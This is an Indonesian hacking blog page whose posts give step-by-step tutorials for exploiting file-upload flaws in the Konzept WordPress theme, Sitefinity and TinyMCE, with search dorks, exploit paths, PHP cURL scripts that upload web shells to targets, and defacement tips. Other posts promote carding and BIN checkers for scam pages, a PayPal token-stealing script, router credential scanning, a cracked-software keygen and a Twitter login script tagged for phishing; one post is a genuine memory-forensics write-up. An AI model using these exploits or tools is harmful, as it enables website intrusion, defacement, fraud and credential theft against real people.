SELAMAT DATANG DI BLOG KAMI

Page Views

Blog Archive

Theme images by Storman. Powered by Blogger.

Labels

Popular Posts

Video Of Day

Friday 29 April 2016

WordPress Theme Konzept Arbitrary File Upload Vulnerability

- No comments
Hello World ; Sore Fans, Please Say Hello Haters :*
Mumpung lagi di Corner wifi.id Telkom bareng ank2 TKJ Cyber Art, sempetin deh buat Posting dan isengin para wifi seeker awkkaw *gretonger
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial WordPress Theme Konzept Arbitrary File Upload Vulnerability *ini exploit lama sih wkwkw

exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*


Langsung intip tutorialnya ;*
Dork : 
inurl:/wp-content/themes/konzept/
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: 
/wp-content/themes/konzept/includes/uploadify/upload.php


3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

Kurang lebihnya sih gituh :v

4. Buat File Baru Berekstensi .php Contoh konzept.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn konzept.php tadi
*btw disini shell ente, ubah dulu ekstensinya jadi .JPG

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
        "file" => "@namashell.jpg",
        "name" => "namashell.php"
);

$ch = curl_init ("www.target.co.li/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;


?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php


7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.


8. Shell Akses: www.target.coli/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php

Done~ Ganteng Ganteng #SWAG akwkawk

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))

*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 0day




./Nuenomaru


Kadang Hidup perlu di Tertawakan









Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Thursday 28 April 2016

GiliSoft Video Editor 7.4.0 Full Keygen

- No comments
gilisoft-video-editor-740-full-keygen
GiliSoft Video Editor 7.4.0 Full Keygen | 20.3MB
GiliSoft Video Editor is a software to edit, modify, split and merge your video. This program can help you to achieve the video of the size and shape you want in terms of cutting and editing, merger and adds optimization and can produce films Veda and after versions of video formats such as AVI, MPEG, H.264, SWF, MOV, WMV and other formats and will work on all devices and computer operations such as iPod, iPhone, PSP, PS3 Wi multimedia devices and other Mobile. 

This program is characterized by easy to use interface that makes it easier for all video editing seamlessly with Line full bar that offers the possibility to determine the video blanking of the start and end points, and also provides the ability to view videos through a special window.

Supported video formats:
3GP, 3G2, AMV, ASF, AVI, DAT, DivX, DV, F4V, FLV, H264, M1V, M2T, M2TS, M2P, M2V, M4V, MKV, MOD, MOV, MP2V, MP4, MPE, MPG, MPEG, MPV, MPV2, MTS, MTV, NSV, OGM, OGV, QT, RM, RMVB, TOD, TP, TRP, TS, VOB, VP6, WebM, WM, WMV 
 
Download Now
Rar Password
freesoft88

Wednesday 27 April 2016

Script BIN Checker By Stupidc0de Family

- No comments
Oke kali ini gausah basa basi, soalnya gw mau lanjut liat anime , hehe
Awal cerita si bib a.k.a sinkaroid ngajak Team Vieweran, dia pengan nampilin BIN info nya di SC Scampage nya.
akhirnya tanpa rencana malah jadi SC ini , kokwokwo

Penampakan :


Untuk demo bisa CEK dimari BIN CHECKER DEMO (BIN.PRINGSEWUDEV.ORG)
Mau diganti Copyright, mau dikembangin Monggo dah,

Download link : KLIK INI 200X LINK DOWNLOAD MUNCUL 


OK sekian saja makasih atas semuanya , kita putus >_< WTF :v

Semoga berguna yee :D
Stupidc0de Family : No Leader we just Laugh Together , salam bacotan salam brazzeran selalu :D


Mobile Prank Hacktool 4.0 - The mobile Prank tool

- No comments


As you may already know Mobile Prank Hacktool is a tool for mobiles. It gives the power to send sms and calls from diferent web services. The Mobile Prank Hacktool was created as a necessity to send sms & call pranks from a computer and play with anyones phone as long as you know the number.

What started as a joke tool has become a comercial tool which it wasn't intend to, so this will be the last release.
I have added a cool layout and Mobile Prank Hacktool is now a full SPA (Single Page Application) tool.

If you enjoy playing around with Mobile Prank Hacktool consider making a small donation by hitting the button Donate. This keeps me developing tools that are release for free to anyone.

Download:
http://www.mediafire.com/download/68rf7d...ol_4.0.rar

Virustotal:
This is a html file so no harm will do to your device and works in all platforms.

Hack Router using RouterScan v2.53

- No comments
Apa itu RouterScan v2.53 ?
Router Scan adalah sebuah tools yang mampu menemukan dan mengidentifikasi berbagai perangkat dari sejumlah besar router, berikut penampakan nya :



Tools ini secara otomatis akan men-SCAN Seluruh router disuatu area jaringan, dan mengidentifikasi username dan password router tersebut.

Penasaran ?
Langsung saja download dari sini GE DOT TETE

OK sekian aja terimakasih semoga berguna bagi nusa, bangsa, dan agama heheh

PHP Script AUTO GET/GENERATE Paypal Token

- No comments
Selamat malem gaes.
Kali ini ane mau share PHP Script Auto Get/Generate Paypal Token
Sebenernya ini code nya simple, cuman ane buat rumit dan ane buat aneh2 , gajelas dah :'v

Sebenernya ini code bukan fungsi asli untuk mengambil paypal token.
Code ini hanya mencuri token dari website checker hehe.
Karena ane kurang paham alur checker nya kaya gimana, jadi ane cuma bisa curi token nya aja :'v
ok karena ane gasuka bacot langsung aja yang mau sedot.

DOWNLOAD LINK : PASTEBIN 

Oke sekian aja , Semoga berguna bagi nusa dan bangsa :)


Tuesday 26 April 2016

eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability

- No comments
Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial Deface dengan eXploit 
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability *ini exploit lama sih wkwkw
exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*

Lanjut intip tutorialnya Gaes :*
Mau sampai Kapan ?!


Dork : 
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
(kembangin lg gunakan otak vokepers kalean, agar dpt yg vuln n verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

3. Vulnerability ~ Muncul tampilan Form Upload


4. Langsung ajeh Upload Shell/File yang ingin lu upload gengs ^_^



5. Jika berhasil terUpload akan muncul nama file/shell lu gengs ^_^



6. Shell/File Akses o.O ??
disini kak-> www.target.co.li/Files/x.aspx


yg gagal upload shell, maenkan Bypass Shell mu kak awkkaw~

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))

*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
Rameikan juga Grup FB: BackBox Jakarta Team
#JoinUs #GoOpenSource

Kunjungi Juga: Forum BackBox Indonesia

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Sitefinity Defaced !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: Groosec Squad





./Nuenomaru















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Script Anonym0us Checker Free Download

- No comments
Ok Siang gaes.

Kali ini ane mau share Script Anonym0us Checker.
Carder pasti udah pada tau lah ya :D
Bagi yang belum tau, silahkan liat penampakannya digambar berikut :



Script ini ane dapet ketika ada temen ngasih SC ini untuk di check apakah ada loggernya atau tidak.
dan setelah ane check ternyata aman tanpa logger.
Script ini masi di encode, yang ane share ini asli dari pemberian temen.

kalo masi takut ada logger, silahkan decode pake Zeura Decoder dan cek sendiri, hehe
Karena ane bukan carder, ane juga anti masang logger.
jadi buat apa , haha

Jangan lupa berkomentar ya , dan juga kalo udah komen jangan diapus lagi.
soalnya ada sih liat sendiri noh di recent comment, gaperlu gua sebut.
Minta SC Lewat email > Bilang dah komen di blog > setelah gua kasih, eh komen nya diapus.
kan gatau diri banget ya , gapunya rasa trimakasih.
mau jadi plagiat kali.

Langsung aja yang mau download : < DOWNLOAD DISINI > (5.3 MB) DatafileHost

Ok sekian aja , Trimakasih. Semoga berguna bagi nusa dan bangsa :'v

Monday 25 April 2016

eXploit Tinymce Images File Upload Vulnerability

- No comments
Mau sampai kapan ?!

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial eXploit Tinymce Images File Upload Vulnerable

xixixhi yoii masih seputar Bug/Celah pada TinyMCE, baca juga Tutorial eXploit TinyMCE Ajax File Manager RCE
xixihi, ini tutorial Nue dapet dari Blog Official Marsel *tengkyu artikel tutorialnya.


Langsung intip tutorialnya :*


Dork : 
inurl:/imgupload/ fileuploader.php
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /[path]
/extlib/tinymce/plugins/imgupload/fileuploader.php


3. Vulnerability ~ {"error":"No files were uploaded."}


kurang lebihnya sih kek gitu <(")

4. Buat File Baru Berekstensi .php Contoh tinymce.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga gambar/file yg ingin di upload sobat di directory yang sama dgn tinymce.php tadi

<?php
$uploadfile="namagambar.jpg";
$ch = curl_init("www.target.co.li/[path]/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php


7. jika sukses , akan muncul nama file sobat di CMD,dan akan keluar lengkap link akses file ente




Langsung cek awkwakaw



Note: File ekstensi hanya bisa: JPG, JPEG, PDF , GIF, PNG, TIF, TIFF , BMP


Ouhiya awkkwak, kalo ada yang berhasil Bypass Shell nya utk exploit ini,, kirim tutorialnya ke fanspage kami yah awkwak >.< ..
nanti akan kami posting disini, dgn anda sebagai author tutorialnya ^_^

xixihi tengkyu sebelumnya :*


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to:Official Marsel | Phantom Ghost | Sulawesi IT Sec


./Nuenomaru





bakar dlu Nikotinnya, seruput lagi Caffeine nya ^_^
#enjoyed














Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Saturday 23 April 2016

Tutorial Memory Forensic dengan Volatility

- No comments
Hello World; , Malam Fans, Please say hello Haters ;)
Nuenomaru disini, awkkawka.. kali ini Gua bakal Share Tutorial Memory Forensic dengan Volatility
ditutor ini sedikit bagaimana cara menggunakan Volatility dan sedikit perintah dan beberapa fungsinya.
ditutor ini, Gua mempraktekan di Kali Linux, silahkan coba di pinguin2 kesayangan anda ;)
btw apa itu Volatility o.O ?? cek mbah google gengs :*

Yoks langsung aja, Terdapat Challenge Memory Forensic yang diberikan oleh Indonesia Digital Forensic Community pada halaman facebook nya.
Berikut adalah Pertanyaan Challenge tersebut:

Challenge bisa didownload disini
Detail File Challenge :

Name : RAM.mem
MD5 : 47ca9f4ef6549705a9337166ac45ea82

Size : 536809472 bytes


Banyak sekali tool yang dapat digunakan untuk melakukan memory forensic, tapi saya memilih volatility untuk mengerjakan Challenge ini, karena volatility powerfull dan mudah digunakan. Untuk penggunaka distro pentest seperti kali linux dan backbox seperti Volatility sudah terinstall otomatis, dan untuk distro linux yang belum terinstall volatility bisa langsung mengunjungi situs resmi nya di ( http://www.volatilityfoundation.org/ ). Volatility ditulis menggunakan bahasa python jadi tidak menutup kemungkinan dapat berjalan di platform Windows, tapi pada tutorial ini saya menggunakan linux dan semua step nya sama saja dengan os-os lain.

Langsung intip tutorialnya ;*

syntaxt umum :

volatility -f FileName <Options>

Pertama Ekstrak dulu filenya:


 Lalu Buka terminal anda gengs ^_^


Pertanyaan nomor 1 :  Identifikasi jenis OS-nya
Untuk identifikasi jenis os nya kita dapat menggunakan Pluginimageinfo


Ketik Perintah: volatility -f RAM.mem imageinfo


pada bagian Suggested Profile(s) dapat kita lihat bahwa RAM.mem didump pada os Windows XP.
Tapi kenapa ada muncul 2 , WinXPSP2 Dan WinXPSP3 ? Iyaa karena itu profile yang tersedia pada   Volatility yang dapat kita gunakan untuk melakukan kegiatan seperti melihat prosses, history dan sebagai nya menggunakan Volatility.

Pertanyaan Nomo 2 :  Identifikasi proses yang mencurigakan

Untuk indentifikasi proses kita bisa menggunakan salah satu Pluginpslist, psscan serta pstreekarena ketiga Plugin tersebut digunakan untuk melihat running proses.

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 pslist


Dari output tersebut kita dapat menentukan proses mana yang mencurigakan, dan gua perhatikan ada proses dengan nama wscript.exepada pid 584, metsvc.exe pada pid 1644 serta qNPEwOBAwGzOSN.Pada pid 1760. karena gua mencuriguakan ketiga proses tersebut merupakan payload dari metasploit ( https://www.offensive-security.com/metasploit-unleashed/interacting-metsvc/).

Pertanyaan  nomo 3 : Identifikasi remote IP yang mentriger proses tersebut

Untuk indentifikasi remote ip tentu kita harus mengecek connection layak nya kita menggunakan netstat, Plugin yang digunakan untuk proses ini bisa kita gunakan connections untuk melihat koneksi yang terbukan ( Windows XP dan Windows Server 2003) serta connscanuntuk melihat koneksi TCP

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 connections

Lalu ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 connscan


terdapat 2 ip yang mempunyai remote koneksi, terus yang mana ini yang bener ? Karena kita tadi mencurigai ini merupakan payload metsvc metasploit, jadi kita coba melihat history internet explore apakah korban mengakses sesuatu yang menyebabkan payload ini bisa dieksekusi di PC korban

Lalu Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 iehistory


Terdapat koneksi ke http://192.168.88.44:8080/payloads/trojan.exedan http://192.168.88.44:8080/payloads/.  Dan tentu kita semua tau ini adalah payload dari metasploit yang kita curigrai sebelum nya.
Ternyata IP yang  mentriger proses tersebut adalah ip 192.168.88.44


Pertanyaan nomor 5 :  Apakah tipe malware yang menginfeksi komputer tersebut
Untuk mengetahui tipe dari malware yang menginfeksi tentu kita bisa menggunakan anti virus, dan agar bisa di scan menggunakan anti virus tentu malware tersebut harus ada, oleh karena itu kita bisa dump malware tersebut dengan Plugin procdump.


Ingat !! proses mencurigakan yang kita kumpulkan pada soal nomor 2 adalah  wscript.exe pada pid584, metsvc.exe pada pid 1644 serta qNPEwOBAwGzOSN. Pada pid 1760, tapi disini kita hanya perlu dump file  metsvc.exe dan qNPEwOBAwGzOSN. Karena wscript tersebut ada karena adanya file trojan.exe tadi sehingga wscript menciptakan proses qNPEwOBAwGzOSN.

Ketik Perintah: mkdir virus
Lalu Ketik perintah: 
volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus



Output dari dump tersebut berada pada directory virus. Selanjutnya mari kita scanning dengan http://virustotal.com/

Hasil Scan Virustotal :

executable.1644.exe 
Detectionratio:16/57

executable.1760.exe
Detection ratio:44 / 55 


Tipe malware tersebut adalah Trojan

Pertanyaan nomor nomor 6 : Apakah dikomputer tersebut terinstall antivirus 
Untuk melihat apakah dikomputer ini terinstall antivirus kita bisa menggunakan plugin shimcache

Ketik Perintah:

volatility -f RAM.mem --profile=WinXPSP2x86 shimcache


Ternyata komputer tersebut menggunakan Anti-Virus Kaspersky Internet Security.

Pertanyaan nomor  7 : Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut


Sebenar nya gua bingung untuk menjawab pertanyaan ini karena pengetahuan saya yang masih kurang, kita dilihat dari proses yang running tidak melihat adanya vulnerable applications, tapi untuk mengecek service nya bisa menggunakan plugin svcscan.

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 svscan




Pada service metsvc tersebut tercipta karena ada nya payload metasploit yang dieksekusi pada komputer korban. Jadi saya simpulkan bahwa service yang vulnrable itu metsvc nya



Untuk pertanyaan bonus nomor 8 masih menjadi misteri, karena sampai saat ini saya belum bisa mengambil file tersebut, file yang dimaksud adalah file account.txt yang terletak di C:/Documents and Settings/WINVICTIM/My Documents/

Yak bagi kalian yang bisa memecahkan pertanyaan nomor 8 Bisa dishare tutorial/write Up nya ke fanspage kami ^_^ .. nanti akan kami posting ke blog ini, dengan source and thanks to Nick anda sebagai penulis tutorial :)

Mudahkan x_O ? gimana o.O ?? udh kek lagi berasa dipilem2 hekel and pentestel ya gengs o.O ? awkawkwka
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting | Memory Forensic
Sekian dan semoga bermanfaat .. terimakasih





Thanks Tutorial dan Write Upnya bang Aiden_
Source and thanks to: forum BackBox Indonesia




./Nuenomaru



Topi kebelakang, Mata ku jauh Menatap KeDepan ;)
















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Friday 22 April 2016

Login Twitter Website using PHP CURL

- No comments
Selamat malam gaes.
gegara koneksi gua ynag gak memadai jadi baru bisa share jam segini :3
padahal SC ini mau ane share tadi siang.

Begini lah koneksi di desa , signal baru nyampe EDGE, itu juga kadang Limited kadang lancar.
Miris ya ? mau berkembang aja susah bener.

oka langsung aja ane mau share PHP CURL LOGIN TWITTER WEBSITE


Bagi yang mau download silahkan :) Edit monggo asal masih nyertain Original Copyright :D

<?php 
error_reporting(0);
# PHP Curl Login Twitter.com By KHOIRUL ANAM
# ini SC nya gak Di Encode kok Bro
# ganti aja namanya cok :)
?>
<?php
if(isset($_POST['twituser'])) {
$username = $_POST['twituser']; #Your username (username kamu)
$password = $_POST['twitpass']; #Your password (password kamu)

$XxXxXXxX = 'Cookie: pid="v3:1459373554400807900051689"; guest_id=v1%3A146121679857512332; _mobile_sess=';
$xxXxXXXX = $username.'&session%5Bpassword%5D='.$password;
$xxXXxxXX = 'BAh7ByIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo';
$XXXxxxXX = 'SGFzaHsABjoKQHVzZWR7ADoQX2NzcmZfdG9rZW4iJTg1ZmQ4MDMwMjRiMGU3OGM3MjY1NzU2OTAwODMwNThk--';
$XXXXxxXx = 'authenticity_token=85fd803024b0e78c726575690083058d&remember_me=1&wfa=1';
$XXxxXXxX = '82d8fbf0b6985d98aa1dc46ac04d6398dc4a1861; mobile_metrics_token=146121682724152226; zrca=5; _ga=GA1.2.589694372.1461216930; _mb_tk=';
$xXXXxxXx = '85fd803024b0e78c726575690083058d; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%25';
$xxxxxxXx = '&redirect_after_login=%2Fhome%3Flogin%3D1461222156095&session%5Busername_or_email%5D=';
$XxXxxXXx = '0ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCD6noDdUAToHaWQiJTFm%250AYzQ1YWFlZDI4NmYwMzkwNmVmYjE0MjkxNGFiMDE1--';
$XxxXXxXx = '3d5009e2a4261ee6556de450e3d6f25480e3923b; ua="f5,m2,m5,msw"';

$gabung1 = $XxXxXXxX.$xxXXxxXX.$XXXxxxXX.$XXxxXXxX.$xXXXxxXx.$XxXxxXXx.$XxxXXxXx;
$gabung2 = $XXXXxxXx.$xxxxxxXx.$xxXxXXXX;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://mobile.twitter.com/sessions');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $gabung2);

$headers = array();
$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:45.0) Gecko/20100101 Firefox/45.0';
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$headers[] = 'Accept-Language: en-US,en;q=0.5';
$headers[] = 'Accept-Encoding: gzip, deflate, br';
$headers[] = 'Referer: https://mobile.twitter.com/login';
$headers[] = $gabung1;
$headers[] = 'Connection: keep-alive';
$headers[] = 'Content-Type: application/x-www-form-urlencoded';


curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt ($ch, CURLOPT_HEADER, 1);

$result = curl_exec($ch);
curl_close($ch);
$hasilcok = urlencode($result);
if(preg_match('#https%3A%2F%2Fmobile.twitter.com%2Fhome%3Flogin%3D#',$hasilcok)) {

$pesan = '<div style="width:200px;" class="msg-hydra-success">Login Success !</div><p>';

}else {
$pesan = '<div style="width:200px;" class="msg-hydra-failed">Login Failed !</div><p>';
}
}
?>
<table width=100% height=80%>
<td align=center>
<style>

.inpt-hydra {
border:1px solid #03B9A8;
border-radius:3px;
padding:7px;
width:90%;
}
.btn-hydra {
background:#03B9A8;
border:1px solid #03B9A8;
border-radius:3px;
padding:7px;
width:90%;
color:white;
}
.btn-hydra:hover {
background:teal;
border:1px solid #03B9A8;
border-radius:3px;
padding:7px;
width:90%;
color:white;
}
.msg-hydra-failed {
background:rgba(253, 0, 0, 0.63);
border:1px solid #FF2626;
border-radius:3px;
padding:3px;

color:white;
}
.msg-hydra-success {

background:rgb(69, 185, 74);
border:1px solid #009606;
border-radius:3px;
padding:3px;

color:white;
}

.panel-hydra {
border:1px solid #383C3B;
color:white;
width:300px;
border-radius:3px;
}
</style>
<div class="panel-hydra">
<h2 style="margin-top:0;padding:10px;color:white;background:#383C3B"><b>Twitter Login</b></h2>
<form method='post' action="">
<?php echo $pesan;?>
<input class="inpt-hydra" type='text' name='twituser' placeholder='username twitter'><p>
<input class="inpt-hydra" type='password' name='twitpass' placeholder='password twitter'><p>
<input class="btn-hydra" type='submit' name='submit' value='Login'>
</form>
<h4 style="margin-bottom:0;padding:5px;color:white;background:#383C3B"><b>&copy 2016 - PRINGSEWUCYBER</b></h4>
</div>
</td></table>

Bisa di test di localhost/cpanel, asalkan jangan cpanel gratisan mah gabisa :D Oke sekian aja posting kali ini. saya pamit undur diri, salam gua ganteng :D

TAG : PHP login twitter, Login Twitter Using PHP, Login Twitter Using CURL, Script Login Twitter, PHP Script, Script Phising Twitter True Login.